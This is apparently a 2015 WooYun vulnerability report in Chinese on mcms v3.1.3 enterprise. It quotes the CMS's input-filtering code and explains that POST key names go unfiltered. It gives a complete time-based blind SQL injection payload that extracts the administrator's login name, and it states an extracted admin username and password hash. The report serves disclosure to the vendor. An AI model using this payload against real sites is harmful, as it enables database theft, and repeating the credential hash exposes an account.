当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105307

漏洞标题:mcms最新版SQL注入二枚打包(可出任意数据)

相关厂商:mcms.cc

漏洞作者: 路人甲

提交时间:2015-04-03 16:59

修复时间:2015-07-08 12:50

公开时间:2015-07-08 12:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-03: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-12: 细节向第三方安全合作伙伴开放
2015-06-03: 细节向核心白帽子及相关领域专家公开
2015-06-13: 细节向普通白帽子公开
2015-06-23: 细节向实习白帽子公开
2015-07-08: 细节向公众公开

简要描述:

mcms最新版SQL注入二枚打包(可出任意数据)

详细说明:

前段时间在wooyun提交了几个mcms的漏洞,以前mcms的版本是v_3.1.1.enterprise, WooYun: mcms最新版SQL注入三枚打包(可出任意数据) ,现在都升级到v_3.1.3.enterprise了,还是来研究一下mcms(v_3.1.3.enterprise)吧。
注入一枚:POST /app/public/info.list.php?m=save&ajax=1(注意public文件夹是安装系统时取的名字)post中有本个参数,虽然都经过了xss和sql的过滤,但是过滤的并不完全,我们看看是如何注入的。
有两个注入点,一个是info_id,一个是price,这里以info_id为例进行说明

function m__save(){
    global $dbm,$C,$V;
    /*
    foreach($_POST as $k=>$v){
        echo('$fields[\''.$k.'\']=isset($_POST[\''.$k.'\'])?trim($_POST[\''.$k.'\']):\'\';<br>');
    }
    die();
    */
    $_POST=H::sqlxss($_POST);//print_r($_POST);
    //处理附件参数
    $attach=array();
    $oname=array();
    $order=array();
    $model_fields=array();
    foreach($_POST as $k=>$v){
        if(substr($k,0,9)=='attach___'){
            $attach[$v]=$v;
            $oname[$v]=($_POST['oname___'.$v]==''?'':$_POST['oname___'.$v]);
            $order[$v]=($_POST['order___'.$v]==''?'':$_POST['order___'.$v]);
        }
        if (substr($k,0,9)=='extern___') { // 填充扩展表字段
            $model_fields[substr($k,9)] = $v;                        
        }


Post的内容经过了过滤,去看看sqlxss()是怎么实现的

public static function sqlxss($input){
    if(is_array($input)){
        foreach($input as $k=>$v){
            $input[$k]=H::sqlxss($v);
        }
    }else{
        $input=H::escape($input,1);
        $input=htmlspecialchars($input,ENT_QUOTES);
    }
    return $input;
}


对用户输入的内容先用H::escape过滤,再用htmlspecialchars过滤,我们再去看看H::escape

public static function escape($input, $urldecode = 0) {
    if(is_array($input)){
        foreach($input as $k=>$v){
            $input[$k]=H::escape($v,$urldecode);
        }
    }else{
        $input=trim($input);
        if ($urldecode == 1) {
            $input=str_replace(array('+'),array('{addplus}'),$input);
            $input = urldecode($input);
            $input=str_replace(array('{addplus}'),array('+'),$input);
        }
        // PHP版本大于5.4.0,直接转义字符
        if (strnatcasecmp(PHP_VERSION, '5.4.0') >= 0) {
            $input = addslashes($input);
        } else {
            // 魔法转义没开启,自动加反斜杠
            if (!get_magic_quotes_gpc()) {
                $input = addslashes($input);
            }
        }
    }
    //防止最后一个反斜杠引起SQL错误如 'abc\'
    if(substr($input,-1,1)=='\\') $input=$input."'";//$input=substr($input,0,strlen($input)-1);
    return $input;
}


对用户的输入过滤的还是很彻底的,但是这里忽略了一点,那就是没有对KEY进行过滤,造成了注入。
Payload:POST提交

extern___info_id`)values(''/**/or(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))or'')#=test&info_id=37&cate_id=5&model_name=product&extern___price=123&info_title=asd&fcolor=&fbold=0&info_stitle=&seo_title=&info_img=&go_url=&info_tags=&info_from=&info_body=asdfas&info_desc=asdfas&level=


因为是time-based blind 注入,猜测管理员用户名的第一个字母时,若错误,延迟2s左右,如下图

猜测失败副本.jpg


若正确,延迟3s左右,如下图

猜测成功副本.jpg


按上面的方法依次做下去(burp intruder或者自己写个脚本跑),可测试管理员用户名为:mcmsadmin,密码为: f6fdffe48c908deb0f4c3bd36c032e72

漏洞证明:

见 详细说明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-09 12:48

厂商回复:

修复中

最新状态:

暂无